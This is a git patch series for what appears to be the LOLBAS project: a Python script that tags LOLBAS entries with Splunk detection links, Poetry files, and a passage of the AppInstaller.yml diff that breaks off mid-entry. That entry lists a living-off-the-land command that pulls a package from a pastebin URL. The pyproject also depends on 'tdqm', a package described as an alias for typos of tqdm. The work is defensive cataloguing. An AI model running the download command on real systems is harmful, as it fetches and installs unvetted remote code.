From 167556ffac764c19b7ab8231403ce0f1a2deb127 Mon Sep 17 00:00:00 2001 From: d1vious Date: Thu, 4 Aug 2022 14:25:50 -0400 Subject: [PATCH 1/4] adding script, still borked --- scripts/enrich_with_splunk.py | 162 ++++++++++++++++++++++++++++++++++ scripts/poetry.lock | 97 ++++++++++++++++++++ scripts/pyproject.toml | 16 ++++ 3 files changed, 275 insertions(+) create mode 100644 scripts/enrich_with_splunk.py create mode 100644 scripts/poetry.lock create mode 100644 scripts/pyproject.toml diff --git a/scripts/enrich_with_splunk.py b/scripts/enrich_with_splunk.py new file mode 100644 index 000000000..22b939364 --- /dev/null +++ b/scripts/enrich_with_splunk.py @@ -0,0 +1,162 @@ +import yaml +import argparse +import sys +import re +import json +from os import path, walk +from tqdm import tqdm + + +def read_security_content_detections(SECURITY_CONTENT_PATH): + types = ["endpoint", "application", "cloud", "network", "web", "experimental", "deprecated"] + manifest_files = [] + for t in types: + for root, dirs, files in walk(SECURITY_CONTENT_PATH + 'detections/' + t): + for file in files: + if file.endswith(".yml"): + manifest_files.append((path.join(root, file))) + + detections = [] + for manifest_file in tqdm(manifest_files): + detection_yaml = dict() + if VERBOSE: + print("processing yaml {0}".format(manifest_file)) + + with open(manifest_file, 'r') as stream: + try: + if 'ssa' not in manifest_file: + object = list(yaml.safe_load_all(stream))[0] + object['file_path'] = manifest_file + except yaml.YAMLError as exc: + print(exc) + print("Error reading {0}".format(manifest_file)) + sys.exit(1) + detection_yaml = object + detections.append(detection_yaml) + return detections + +def read_lolbas(LOLBAS_PATH): + types = ["OSBinaries", "OSLibraries", "OSScripts", "OtherMSBinaries"] + manifest_files = [] + for t in types: + for root, dirs, files in walk(LOLBAS_PATH + '/yml/' + t): + for file in files: + if file.endswith(".yml"): + manifest_files.append((path.join(root, file))) + + lolbas = [] + for manifest_file in tqdm(manifest_files): + lolba_yaml = dict() + if VERBOSE: + print("processing yaml {0}".format(manifest_file)) + + with open(manifest_file, 'r') as stream: + try: + object = list(yaml.safe_load_all(stream))[0] + object['file_path'] = manifest_file + except yaml.YAMLError as exc: + print(exc) + print("Error reading {0}".format(manifest_file)) + sys.exit(1) + lolba_yaml = object + lolbas.append(lolba_yaml) + return lolbas + +def confirm_match(lolba, matching_id_detections): + matching_detections = [] + search_word = lolba['Name'].split('.')[0] + for detection in matching_id_detections: + if re.findall(search_word, detection['name'], re.IGNORECASE): + matching_detections.append(detection) + + return matching_detections + +def enrich_lolbas(detections,lolbas): + detections_with_mitre = dict() + enriched_lolbas = [] + + for detection in detections: + detection_obj = dict() + detection_obj['name'] = detection['name'] + detection_obj['id'] = detection['id'] + detection_obj['description'] = detection['description'] + detection_obj['kind'] = detection['file_path'].split('/')[-2] + + if 'mitre_attack_id' in detection['tags']: + for mitre_id in detection['tags']['mitre_attack_id']: + if mitre_id not in detections_with_mitre: + detections_with_mitre[mitre_id] = [] + detections_with_mitre[mitre_id].append(detection_obj) + else: + detections_with_mitre[mitre_id].append(detection_obj) + + for lolba in lolbas: + for command in lolba['Commands']: + if 'MitreID' in command: + if command['MitreID'] in detections_with_mitre: + matching_id_detections = detections_with_mitre[command['MitreID']] + matching_detections = confirm_match(lolba,matching_id_detections) + for matching_detection in matching_detections: + print(lolba['Name'], matching_detection['name']) + detection_string = 'Splunk: https://research.splunk.com/' + matching_detection['kind'] + '/' + matching_detection['id'] + '/' + if 'Detection' in lolba and lolba['Detection'] != None: + lolba['Detection'].append(detection_string) + else: + lolba['Detection'] = [] + lolba['Detection'].append(detection_string) + + # unique all detections + unique_detection_list = [] + if 'Detection' in lolba and lolba['Detection'] != None: + for detection in lolba['Detection']: + if detection in unique_detection_list: + pass + else: + unique_detection_list.append(detection) + lolba['Detection'] = unique_detection_list + enriched_lolbas.append(lolba) + return enriched_lolbas + +def write_lolbas(enriched_lolbas, LOLBAS_PATH): + for lolba in enriched_lolbas: + file_path = lolba['file_path'] + lolba.pop('file_path') + print(yaml.dump(lolba, indent=2)) + with open(file_path, 'w') as outfile: + yaml.dump(lolba, outfile, default_flow_style=False, sort_keys=False) + +if __name__ == "__main__": + + # grab arguments + parser = argparse.ArgumentParser(description="Generates documentation from Splunk Security Content", epilog=""" + This generates documention in the form of jekyll site research.splunk.com from Splunk Security Content yamls. """) + parser.add_argument("-splunk_security_content_path", "--spath", required=False, default='security_content/', help="path to security_content repo") + parser.add_argument("-lolbas_path", "--lpath", required=False, default='.', help="path to the lolbas repo") + parser.add_argument("-v", "--verbose", required=False, default=False, action='store_true', help="prints verbose output") + + # parse them + args = parser.parse_args() + SECURITY_CONTENT_PATH = args.spath + LOLBAS_PATH = args.lpath + VERBOSE = args.verbose + + if not (path.isdir(SECURITY_CONTENT_PATH) or path.isdir(SECURITY_CONTENT_PATH)): + print("error: {0} is not a directory".format(SECURITY_CONTENT_PATH)) + sys.exit(1) + + print("processing splunk security content detections") + detections = read_security_content_detections(SECURITY_CONTENT_PATH) + print("processing lolbas") + lolbas = read_lolbas(LOLBAS_PATH) + print("enriching lolbas") + enriched_lolbas = enrich_lolbas(detections, lolbas) + print("writing enriched lolbas") + write_lolbas(enriched_lolbas, LOLBAS_PATH) + + + + + + + + diff --git a/scripts/poetry.lock b/scripts/poetry.lock new file mode 100644 index 000000000..5e859ab4b --- /dev/null +++ b/scripts/poetry.lock @@ -0,0 +1,97 @@ +[[package]] +name = "colorama" +version = "0.4.5" +description = "Cross-platform colored terminal text." +category = "main" +optional = false +python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*" + +[[package]] +name = "pyyaml" +version = "6.0" +description = "YAML parser and emitter for Python" +category = "main" +optional = false +python-versions = ">=3.6" + +[[package]] +name = "tdqm" +version = "0.0.1" +description = "Alias for typos of tqdm" +category = "main" +optional = false +python-versions = "*" + +[package.dependencies] +tqdm = "*" + +[[package]] +name = "tqdm" +version = "4.64.0" +description = "Fast, Extensible Progress Meter" +category = "main" +optional = false +python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,>=2.7" + +[package.dependencies] +colorama = {version = "*", markers = "platform_system == \"Windows\""} + +[package.extras] +dev = ["py-make (>=0.1.0)", "twine", "wheel"] +notebook = ["ipywidgets (>=6)"] +slack = ["slack-sdk"] +telegram = ["requests"] + +[metadata] +lock-version = "1.1" +python-versions = "^3.10" +content-hash = "087bda08183848db65ef1c952e6b909f12ddf694a319a2d9523671101c8a7f8c" + +[metadata.files] +colorama = [ + {file = "colorama-0.4.5-py2.py3-none-any.whl", hash = "sha256:854bf444933e37f5824ae7bfc1e98d5bce2ebe4160d46b5edf346a89358e99da"}, + {file = "colorama-0.4.5.tar.gz", hash = "sha256:e6c6b4334fc50988a639d9b98aa429a0b57da6e17b9a44f0451f930b6967b7a4"}, +] +pyyaml = [ + {file = "PyYAML-6.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:d4db7c7aef085872ef65a8fd7d6d09a14ae91f691dec3e87ee5ee0539d516f53"}, + {file = "PyYAML-6.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:9df7ed3b3d2e0ecfe09e14741b857df43adb5a3ddadc919a2d94fbdf78fea53c"}, + {file = "PyYAML-6.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:77f396e6ef4c73fdc33a9157446466f1cff553d979bd00ecb64385760c6babdc"}, + {file = "PyYAML-6.0-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:a80a78046a72361de73f8f395f1f1e49f956c6be882eed58505a15f3e430962b"}, + {file = "PyYAML-6.0-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:f84fbc98b019fef2ee9a1cb3ce93e3187a6df0b2538a651bfb890254ba9f90b5"}, + {file = "PyYAML-6.0-cp310-cp310-win32.whl", hash = "sha256:2cd5df3de48857ed0544b34e2d40e9fac445930039f3cfe4bcc592a1f836d513"}, + {file = "PyYAML-6.0-cp310-cp310-win_amd64.whl", hash = "sha256:daf496c58a8c52083df09b80c860005194014c3698698d1a57cbcfa182142a3a"}, + {file = "PyYAML-6.0-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:897b80890765f037df3403d22bab41627ca8811ae55e9a722fd0392850ec4d86"}, + {file = "PyYAML-6.0-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:50602afada6d6cbfad699b0c7bb50d5ccffa7e46a3d738092afddc1f9758427f"}, + {file = "PyYAML-6.0-cp36-cp36m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:48c346915c114f5fdb3ead70312bd042a953a8ce5c7106d5bfb1a5254e47da92"}, + {file = "PyYAML-6.0-cp36-cp36m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:98c4d36e99714e55cfbaaee6dd5badbc9a1ec339ebfc3b1f52e293aee6bb71a4"}, + {file = "PyYAML-6.0-cp36-cp36m-win32.whl", hash = "sha256:0283c35a6a9fbf047493e3a0ce8d79ef5030852c51e9d911a27badfde0605293"}, + {file = "PyYAML-6.0-cp36-cp36m-win_amd64.whl", hash = "sha256:07751360502caac1c067a8132d150cf3d61339af5691fe9e87803040dbc5db57"}, + {file = "PyYAML-6.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:819b3830a1543db06c4d4b865e70ded25be52a2e0631ccd2f6a47a2822f2fd7c"}, + {file = "PyYAML-6.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:473f9edb243cb1935ab5a084eb238d842fb8f404ed2193a915d1784b5a6b5fc0"}, + {file = "PyYAML-6.0-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:0ce82d761c532fe4ec3f87fc45688bdd3a4c1dc5e0b4a19814b9009a29baefd4"}, + {file = "PyYAML-6.0-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:231710d57adfd809ef5d34183b8ed1eeae3f76459c18fb4a0b373ad56bedcdd9"}, + {file = "PyYAML-6.0-cp37-cp37m-win32.whl", hash = "sha256:c5687b8d43cf58545ade1fe3e055f70eac7a5a1a0bf42824308d868289a95737"}, + {file = "PyYAML-6.0-cp37-cp37m-win_amd64.whl", hash = "sha256:d15a181d1ecd0d4270dc32edb46f7cb7733c7c508857278d3d378d14d606db2d"}, + {file = "PyYAML-6.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:0b4624f379dab24d3725ffde76559cff63d9ec94e1736b556dacdfebe5ab6d4b"}, + {file = "PyYAML-6.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:213c60cd50106436cc818accf5baa1aba61c0189ff610f64f4a3e8c6726218ba"}, + {file = "PyYAML-6.0-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:9fa600030013c4de8165339db93d182b9431076eb98eb40ee068700c9c813e34"}, + {file = "PyYAML-6.0-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:277a0ef2981ca40581a47093e9e2d13b3f1fbbeffae064c1d21bfceba2030287"}, + {file = "PyYAML-6.0-cp38-cp38-win32.whl", hash = "sha256:d4eccecf9adf6fbcc6861a38015c2a64f38b9d94838ac1810a9023a0609e1b78"}, + {file = "PyYAML-6.0-cp38-cp38-win_amd64.whl", hash = "sha256:1e4747bc279b4f613a09eb64bba2ba602d8a6664c6ce6396a4d0cd413a50ce07"}, + {file = "PyYAML-6.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:055d937d65826939cb044fc8c9b08889e8c743fdc6a32b33e2390f66013e449b"}, + {file = "PyYAML-6.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:e61ceaab6f49fb8bdfaa0f92c4b57bcfbea54c09277b1b4f7ac376bfb7a7c174"}, + {file = "PyYAML-6.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d67d839ede4ed1b28a4e8909735fc992a923cdb84e618544973d7dfc71540803"}, + {file = "PyYAML-6.0-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:cba8c411ef271aa037d7357a2bc8f9ee8b58b9965831d9e51baf703280dc73d3"}, + {file = "PyYAML-6.0-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:40527857252b61eacd1d9af500c3337ba8deb8fc298940291486c465c8b46ec0"}, + {file = "PyYAML-6.0-cp39-cp39-win32.whl", hash = "sha256:b5b9eccad747aabaaffbc6064800670f0c297e52c12754eb1d976c57e4f74dcb"}, + {file = "PyYAML-6.0-cp39-cp39-win_amd64.whl", hash = "sha256:b3d267842bf12586ba6c734f89d1f5b871df0273157918b0ccefa29deb05c21c"}, + {file = "PyYAML-6.0.tar.gz", hash = "sha256:68fb519c14306fec9720a2a5b45bc9f0c8d1b9c72adf45c37baedfcd949c35a2"}, +] +tdqm = [ + {file = "tdqm-0.0.1-py2-none-any.whl", hash = "sha256:85680e5b7d78470cd80f87f348180f3fc924afe799f472e0f2e71bc82927e0c1"}, + {file = "tdqm-0.0.1.tar.gz", hash = "sha256:f050004a76b1d22f70b78209b48781353c82440215b6ba7d22b1f499b05a0101"}, +] +tqdm = [ + {file = "tqdm-4.64.0-py2.py3-none-any.whl", hash = "sha256:74a2cdefe14d11442cedf3ba4e21a3b84ff9a2dbdc6cfae2c34addb2a14a5ea6"}, + {file = "tqdm-4.64.0.tar.gz", hash = "sha256:40be55d30e200777a307a7585aee69e4eabb46b4ec6a4b4a5f2d9f11e7d5408d"}, +] diff --git a/scripts/pyproject.toml b/scripts/pyproject.toml new file mode 100644 index 000000000..4bead04ce --- /dev/null +++ b/scripts/pyproject.toml @@ -0,0 +1,16 @@ +[tool.poetry] +name = "enrich_with_splunk" +version = "0.1.0" +description = "Enriches LOLBAS YAMLs with Splunk Security Content detections" +authors = ["d1vious "] + +[tool.poetry.dependencies] +python = "^3.10" +PyYAML = "^6.0" +tdqm = "^0.0.1" + +[tool.poetry.dev-dependencies] + +[build-system] +requires = ["poetry-core>=1.0.0"] +build-backend = "poetry.core.masonry.api" From e77f8d017acc602bea7ebc803d8ec58847df5676 Mon Sep 17 00:00:00 2001 From: d1vious Date: Thu, 11 Aug 2022 18:33:04 -0400 Subject: [PATCH 2/4] adding splunk detections to the lolbas yml --- scripts/enrich_with_splunk.py | 84 +++-- yml/OSBinaries/AppInstaller.yml | 29 +- yml/OSBinaries/Aspnet_Compiler.yml | 58 +-- yml/OSBinaries/At.yml | 61 ++-- yml/OSBinaries/Atbroker.yml | 42 +-- yml/OSBinaries/Bash.yml | 83 +++-- yml/OSBinaries/Bitsadmin.yml | 113 +++--- yml/OSBinaries/Certoc.yml | 54 ++- yml/OSBinaries/Certreq.yml | 53 +-- yml/OSBinaries/Certutil.yml | 140 +++---- yml/OSBinaries/Cmd.yml | 61 ++-- yml/OSBinaries/Cmdkey.yml | 34 +- yml/OSBinaries/Cmdl32.yml | 36 +- yml/OSBinaries/Cmstp.yml | 80 ++-- yml/OSBinaries/ConfigSecurityPolicy.yml | 52 +-- yml/OSBinaries/Conhost.yml | 34 +- yml/OSBinaries/Control.yml | 56 +-- yml/OSBinaries/Csc.yml | 56 +-- yml/OSBinaries/Cscript.yml | 46 +-- yml/OSBinaries/DataSvcUtil.yml | 47 +-- yml/OSBinaries/Desktopimgdownldr.yml | 37 +- yml/OSBinaries/Dfsvc.yml | 39 +- yml/OSBinaries/Diantz.yml | 59 +-- yml/OSBinaries/Diskshadow.yml | 55 ++- yml/OSBinaries/Dnscmd.yml | 52 +-- yml/OSBinaries/Esentutl.yml | 126 +++---- yml/OSBinaries/Eventvwr.yml | 53 +-- yml/OSBinaries/Expand.yml | 68 ++-- yml/OSBinaries/Explorer.yml | 65 ++-- yml/OSBinaries/Extexport.yml | 37 +- yml/OSBinaries/Extrac32.yml | 98 ++--- yml/OSBinaries/Findstr.yml | 82 +++-- yml/OSBinaries/Finger.yml | 65 ++-- yml/OSBinaries/FltMC.yml | 36 +- yml/OSBinaries/Forfiles.yml | 61 ++-- yml/OSBinaries/Ftp.yml | 65 ++-- yml/OSBinaries/GfxDownloadWrapper.yml | 345 +++++++++--------- yml/OSBinaries/Gpscript.yml | 52 +-- yml/OSBinaries/Hh.yml | 56 ++- yml/OSBinaries/IMEWDBLD.yml | 31 +- yml/OSBinaries/Ie4uinit.yml | 42 +-- yml/OSBinaries/Ieexec.yml | 59 +-- yml/OSBinaries/Ilasm.yml | 48 ++- yml/OSBinaries/Infdefaultinstall.yml | 37 +- yml/OSBinaries/Installutil.yml | 74 ++-- yml/OSBinaries/Jsc.yml | 56 +-- yml/OSBinaries/Makecab.yml | 69 ++-- yml/OSBinaries/Mavinject.yml | 60 +-- .../Microsoft.Workflow.Compiler.yml | 106 +++--- yml/OSBinaries/Mmc.yml | 57 +-- yml/OSBinaries/MpCmdRun.yml | 101 ++--- yml/OSBinaries/Msbuild.yml | 145 ++++---- yml/OSBinaries/Msconfig.yml | 38 +- yml/OSBinaries/Msdt.yml | 57 +-- yml/OSBinaries/Mshta.yml | 133 +++---- yml/OSBinaries/Msiexec.yml | 94 ++--- yml/OSBinaries/Netsh.yml | 60 +-- yml/OSBinaries/Odbcconf.yml | 62 ++-- yml/OSBinaries/OfflineScannerShell.yml | 29 +- yml/OSBinaries/OneDriveStandaloneUpdater.yml | 37 +- yml/OSBinaries/Pcalua.yml | 63 ++-- yml/OSBinaries/Pcwrun.yml | 30 +- yml/OSBinaries/Pktmon.yml | 52 +-- yml/OSBinaries/Pnputil.yml | 32 +- yml/OSBinaries/Presentationhost.yml | 36 +- yml/OSBinaries/Print.yml | 67 ++-- yml/OSBinaries/PrintBrm.yml | 46 +-- yml/OSBinaries/Psr.yml | 35 +- yml/OSBinaries/Rasautou.yml | 36 +- yml/OSBinaries/Rdrleakdiag.yml | 71 ++-- yml/OSBinaries/Reg.yml | 63 ++-- yml/OSBinaries/Regasm.yml | 65 ++-- yml/OSBinaries/Regedit.yml | 50 ++- yml/OSBinaries/Regini.yml | 36 +- yml/OSBinaries/Register-cimprovider.yml | 34 +- yml/OSBinaries/Regsvcs.yml | 60 +-- yml/OSBinaries/Regsvr32.yml | 104 +++--- yml/OSBinaries/Replace.yml | 50 ++- yml/OSBinaries/Rpcping.yml | 66 ++-- yml/OSBinaries/Rundll32.yml | 192 +++++----- yml/OSBinaries/Runonce.yml | 42 +-- yml/OSBinaries/Runscripthelper.yml | 41 +-- yml/OSBinaries/Sc.yml | 54 ++- yml/OSBinaries/Schtasks.yml | 57 +-- yml/OSBinaries/Scriptrunner.yml | 55 ++- yml/OSBinaries/SettingSyncHost.yml | 56 +-- yml/OSBinaries/Stordiag.yml | 35 +- yml/OSBinaries/Syncappvpublishingserver.yml | 38 +- yml/OSBinaries/Ttdinject.yml | 66 ++-- yml/OSBinaries/Tttracer.yml | 60 ++- yml/OSBinaries/Vbc.yml | 48 ++- yml/OSBinaries/Verclsid.yml | 37 +- yml/OSBinaries/Wab.yml | 36 +- yml/OSBinaries/Wlrmdr.yml | 44 ++- yml/OSBinaries/Wmic.yml | 172 ++++----- yml/OSBinaries/WorkFolders.yml | 37 +- yml/OSBinaries/Wscript.yml | 63 ++-- yml/OSBinaries/Wsreset.yml | 51 +-- yml/OSBinaries/Wuauclt.yml | 39 +- yml/OSBinaries/Xwizard.yml | 90 ++--- yml/OSLibraries/Advpack.yml | 114 +++--- yml/OSLibraries/Desk.yml | 70 ++-- yml/OSLibraries/Dfshim.yml | 57 ++- yml/OSLibraries/Ieadvpack.yml | 106 +++--- yml/OSLibraries/Ieframe.yml | 44 +-- yml/OSLibraries/Mshtml.yml | 35 +- yml/OSLibraries/Pcwutl.yml | 36 +- yml/OSLibraries/Setupapi.yml | 75 ++-- yml/OSLibraries/Shdocvw.yml | 44 +-- yml/OSLibraries/Shell32.yml | 78 ++-- yml/OSLibraries/Syssetup.yml | 71 ++-- yml/OSLibraries/Url.yml | 125 ++++--- yml/OSLibraries/Zipfldr.yml | 54 ++- yml/OSLibraries/comsvcs.yml | 41 ++- yml/OSScripts/CL_LoadAssembly.yml | 52 +-- yml/OSScripts/CL_mutexverifiers.yml | 44 +-- yml/OSScripts/Cl_invocation.yml | 44 +-- yml/OSScripts/Manage-bde.yml | 62 ++-- yml/OSScripts/Pubprn.yml | 41 ++- yml/OSScripts/Syncappvpublishingserver.yml | 39 +- yml/OSScripts/UtilityFunctions.yml | 51 +-- yml/OSScripts/Winrm.yml | 102 +++--- yml/OSScripts/pester.yml | 35 +- yml/OtherMSBinaries/AccCheckConsole.yml | 56 +-- yml/OtherMSBinaries/Adplus.yml | 30 +- yml/OtherMSBinaries/Agentexecutor.yml | 49 +-- yml/OtherMSBinaries/Appvlp.yml | 77 ++-- yml/OtherMSBinaries/Bginfo.yml | 108 +++--- yml/OtherMSBinaries/Cdb.yml | 72 ++-- yml/OtherMSBinaries/Coregen.yml | 84 +++-- yml/OtherMSBinaries/Csi.yml | 42 +-- yml/OtherMSBinaries/DefaultPack.yml | 33 +- yml/OtherMSBinaries/Devtoolslauncher.yml | 47 ++- yml/OtherMSBinaries/Dnx.yml | 37 +- yml/OtherMSBinaries/Dotnet.yml | 65 ++-- yml/OtherMSBinaries/Dump64.yml | 28 +- yml/OtherMSBinaries/Dxcap.yml | 32 +- yml/OtherMSBinaries/Excel.yml | 62 ++-- yml/OtherMSBinaries/Fsi.yml | 77 ++-- yml/OtherMSBinaries/FsiAnyCpu.yml | 68 ++-- yml/OtherMSBinaries/Mftrace.yml | 50 ++- yml/OtherMSBinaries/Msdeploy.yml | 46 ++- yml/OtherMSBinaries/Msxsl.yml | 84 ++--- yml/OtherMSBinaries/Ntdsutil.yml | 37 +- yml/OtherMSBinaries/Powerpnt.yml | 58 ++- yml/OtherMSBinaries/Procdump.yml | 68 ++-- yml/OtherMSBinaries/Rcsi.yml | 50 ++- yml/OtherMSBinaries/Remote.yml | 58 ++- yml/OtherMSBinaries/Sqldumper.yml | 56 +-- yml/OtherMSBinaries/Sqlps.yml | 58 +-- yml/OtherMSBinaries/Sqltoolsps.yml | 38 +- yml/OtherMSBinaries/Squirrel.yml | 106 +++--- yml/OtherMSBinaries/Te.yml | 34 +- yml/OtherMSBinaries/Tracker.yml | 50 +-- yml/OtherMSBinaries/Update.yml | 243 ++++++------ yml/OtherMSBinaries/VSIISExeLauncher.yml | 31 +- yml/OtherMSBinaries/VisualUiaVerifyNative.yml | 62 ++-- yml/OtherMSBinaries/Vsjitdebugger.yml | 30 +- yml/OtherMSBinaries/Wfc.yml | 55 ++- yml/OtherMSBinaries/Winword.yml | 62 ++-- yml/OtherMSBinaries/Wsl.yml | 86 ++--- 161 files changed, 5125 insertions(+), 4998 deletions(-) diff --git a/scripts/enrich_with_splunk.py b/scripts/enrich_with_splunk.py index 22b939364..82cc2c420 100644 --- a/scripts/enrich_with_splunk.py +++ b/scripts/enrich_with_splunk.py @@ -7,7 +7,7 @@ from tqdm import tqdm -def read_security_content_detections(SECURITY_CONTENT_PATH): +def read_security_content_detections(SECURITY_CONTENT_PATH, VERBOSE): types = ["endpoint", "application", "cloud", "network", "web", "experimental", "deprecated"] manifest_files = [] for t in types: @@ -20,7 +20,7 @@ def read_security_content_detections(SECURITY_CONTENT_PATH): for manifest_file in tqdm(manifest_files): detection_yaml = dict() if VERBOSE: - print("processing yaml {0}".format(manifest_file)) + print("processing detection yaml {0}".format(manifest_file)) with open(manifest_file, 'r') as stream: try: @@ -35,7 +35,7 @@ def read_security_content_detections(SECURITY_CONTENT_PATH): detections.append(detection_yaml) return detections -def read_lolbas(LOLBAS_PATH): +def read_lolbas(LOLBAS_PATH, VERBOSE): types = ["OSBinaries", "OSLibraries", "OSScripts", "OtherMSBinaries"] manifest_files = [] for t in types: @@ -48,7 +48,7 @@ def read_lolbas(LOLBAS_PATH): for manifest_file in tqdm(manifest_files): lolba_yaml = dict() if VERBOSE: - print("processing yaml {0}".format(manifest_file)) + print("processing lolba yaml {0}".format(manifest_file)) with open(manifest_file, 'r') as stream: try: @@ -64,14 +64,54 @@ def read_lolbas(LOLBAS_PATH): def confirm_match(lolba, matching_id_detections): matching_detections = [] + # grab just the name but not extension search_word = lolba['Name'].split('.')[0] + # remove any (64) entries + search_word = re.sub(r'\(\d+\)', '', search_word) + for detection in matching_id_detections: if re.findall(search_word, detection['name'], re.IGNORECASE): matching_detections.append(detection) return matching_detections -def enrich_lolbas(detections,lolbas): +def insert_splunk_detections(lolba, matching_detections): + splunk_detections = [] + + # build splunk detection entry object + for matching_detection in matching_detections: + detection_entry = {'Splunk' : "https://research.splunk.com/" + matching_detection['kind'] + "/" + matching_detection['id'] + "/"} + splunk_detections.append(detection_entry) + + # clean up current splunk entries + lolba_detections = [] + if 'Detection' in lolba and lolba['Detection'] != None: + for detection in lolba['Detection']: + lolba_detections.append(detection) + + # extend cleaned up detections with correct splunk urls + lolba_detections.extend(splunk_detections) + + # replace list with newly cleaned + lolba['Detection'] = lolba_detections + + return lolba + +def unique_detections(lolba_with_detections, lolba, VERBOSE): + # unique all detections + unique_detection_list = [] + if 'Detection' in lolba_with_detections and lolba_with_detections['Detection'] != None: + for detection in lolba_with_detections['Detection']: + if detection in unique_detection_list: + pass + else: + if VERBOSE: + print("enriching lolba {0} with matching splunk detection: {1}".format(lolba['Name'], detection)) + unique_detection_list.append(detection) + lolba['Detection'] = unique_detection_list + return lolba + +def enrich_lolbas(detections, lolbas, VERBOSE): detections_with_mitre = dict() enriched_lolbas = [] @@ -90,38 +130,26 @@ def enrich_lolbas(detections,lolbas): else: detections_with_mitre[mitre_id].append(detection_obj) + lolba_with_detections = dict() for lolba in lolbas: for command in lolba['Commands']: if 'MitreID' in command: if command['MitreID'] in detections_with_mitre: matching_id_detections = detections_with_mitre[command['MitreID']] matching_detections = confirm_match(lolba,matching_id_detections) - for matching_detection in matching_detections: - print(lolba['Name'], matching_detection['name']) - detection_string = 'Splunk: https://research.splunk.com/' + matching_detection['kind'] + '/' + matching_detection['id'] + '/' - if 'Detection' in lolba and lolba['Detection'] != None: - lolba['Detection'].append(detection_string) - else: - lolba['Detection'] = [] - lolba['Detection'].append(detection_string) - + lolba_with_detections = insert_splunk_detections(lolba, matching_detections) + # unique all detections - unique_detection_list = [] - if 'Detection' in lolba and lolba['Detection'] != None: - for detection in lolba['Detection']: - if detection in unique_detection_list: - pass - else: - unique_detection_list.append(detection) - lolba['Detection'] = unique_detection_list + lolba = unique_detections(lolba_with_detections, lolba, VERBOSE) enriched_lolbas.append(lolba) return enriched_lolbas -def write_lolbas(enriched_lolbas, LOLBAS_PATH): +def write_lolbas(enriched_lolbas, LOLBAS_PATH, VERBOSE): for lolba in enriched_lolbas: file_path = lolba['file_path'] lolba.pop('file_path') - print(yaml.dump(lolba, indent=2)) + if VERBOSE: + print(yaml.dump(lolba, indent=2)) with open(file_path, 'w') as outfile: yaml.dump(lolba, outfile, default_flow_style=False, sort_keys=False) @@ -145,13 +173,13 @@ def write_lolbas(enriched_lolbas, LOLBAS_PATH): sys.exit(1) print("processing splunk security content detections") - detections = read_security_content_detections(SECURITY_CONTENT_PATH) + detections = read_security_content_detections(SECURITY_CONTENT_PATH, VERBOSE) print("processing lolbas") - lolbas = read_lolbas(LOLBAS_PATH) + lolbas = read_lolbas(LOLBAS_PATH, VERBOSE) print("enriching lolbas") - enriched_lolbas = enrich_lolbas(detections, lolbas) + enriched_lolbas = enrich_lolbas(detections, lolbas, VERBOSE) print("writing enriched lolbas") - write_lolbas(enriched_lolbas, LOLBAS_PATH) + write_lolbas(enriched_lolbas, LOLBAS_PATH, VERBOSE) diff --git a/yml/OSBinaries/AppInstaller.yml b/yml/OSBinaries/AppInstaller.yml index a7aa5b572..1eeb06ed0 100644 --- a/yml/OSBinaries/AppInstaller.yml +++ b/yml/OSBinaries/AppInstaller.yml @@ -1,23 +1,22 @@ ---- Name: AppInstaller.exe Description: Tool used for installation of AppX/MSIX applications on Windows 10 -Author: 'Wade Hickey' +Author: Wade Hickey Created: '2020-12-02' Commands: - - Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw - Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\ - Usecase: Download file from Internet - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows 10 +- Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw + Description: AppInstaller.exe is spawned by the default handler for the URI, it + attempts to load/install a package from the URL and is saved in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\ + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10 Full_Path: - - Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe +- Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/bdb00f403fd8ede0daa04449ad913200af9466ff/rules/windows/dns_query/win_dq_lobas_appinstaller.yml +- Sigma: 